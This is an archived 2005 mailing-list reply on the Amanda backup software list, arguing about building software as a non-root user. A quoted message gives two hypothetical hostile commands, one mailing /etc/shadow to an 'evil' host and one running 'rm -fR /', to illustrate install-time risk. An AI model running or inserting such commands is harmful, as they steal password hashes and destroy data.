Amanda-Users
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: Fedora Core 3 - which version of tar??

2005-01-21 22:54:03
Subject: Re: Fedora Core 3 - which version of tar??
From: Jon LaBadie <jon AT jgcomp DOT com>
To: amanda-users AT amanda DOT org
Date: Fri, 21 Jan 2005 22:42:56 -0500 
On Fri, Jan 21, 2005 at 06:15:28PM -0600, Frank Smith wrote:
> 
> 
> --On Friday, January 21, 2005 18:18:52 -0500 Eric Siegerman <erics AT 
> telepres DOT com> wrote:
> 
> > On Thu, Jan 20, 2005 at 10:22:16PM +0100, Stefan G. Weichinger wrote:
> >> - configure and make as $AMANDAUSER
> > 
> > I don't believe this is necessary.  One should avoid building
> > Amanda as root, but that's not because it'll cause problems for
> > Amanda; it's for the same reason one should avoid building
> > *anything* as root.
> 
> Sorry for hijacking a thread, but playing devil's advocate here,
> what difference does it really make whether you build as root
> or not if you run 'make install' as root?  How many people
> actually go through each line of the makefile, or run make -n
> first and examine all that, plus look through the code itself?
>    In Amanda's case, for example, if the source for runtar
> contained code to 'mailx hax0r AT evil DOT com < /etc/shadow' or
> 'rm -fR /' would it really make any difference what user it
> was compiled under?  Would they notice even if it wasn't buried
> in the source, but was just part of the 'install' target in
> the makefile (or an included subdirectory makefile)?
>    For user programs, compiling and installing as a user
> can limit the damage that can be done, but if any part of
> the build, install, or execution ever has root privileges
> then you really aren't increasing  your security by building
> as a normal user and installing as root.
>    All that said, I generally do build as a normal user, as
> it can expose permission problems on libraries, paths, etc.
> at build time instead of later when users are trying to run
> the program.

You have said it yourself, as ordinary user you limit the
possible problems.  Have you never looked at a file with
an editor and inadvertently modified it?  Don't you ever
do little changes to the code or makefiles?  How about
running your builds from a script as Gene H. does.  Or
running my configure with a script that modifies the makefiles
to allow me a target of *.i output files (post-preprocessor).

I don't want to run these things as root.  There doesn't have
to be anything malicious to be dangerous or unwanted.  Just a
simple error that might cause less damage run by amanda than
run by root.  Or even by user jon.  Suppose I had a simple "cd"
in one of these scripts; like

   cd $AmandaBuildDir

But I forgot to properly set AmandaBuildDir, or I misspelled it
in the script.  Now it is a "cd <with no args>" meaning a cd to
the home directory of the person running it.  I would rather it
went to amanda's, not jon's and certainly not root's home dir
before continuing the script.

jl
-- 
Jon H. LaBadie                  jon AT jgcomp DOT com
 JG Computing
 4455 Province Line Road        (609) 252-0159
 Princeton, NJ  08540-4322      (609) 683-7220 (fax)
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: Fedora Core 3 - which version of tar??, Frank Smith
Next by Date:  Re: Fedora Core 3 - which version of tar??, Gene Heskett
Previous by Thread:  Re: Fedora Core 3 - which version of tar??, Frank Smith
Next by Thread:  Re: Fedora Core 3 - which version of tar??, Gene Heskett
Indexes:  [Date] [Thread] [Top] [All Lists]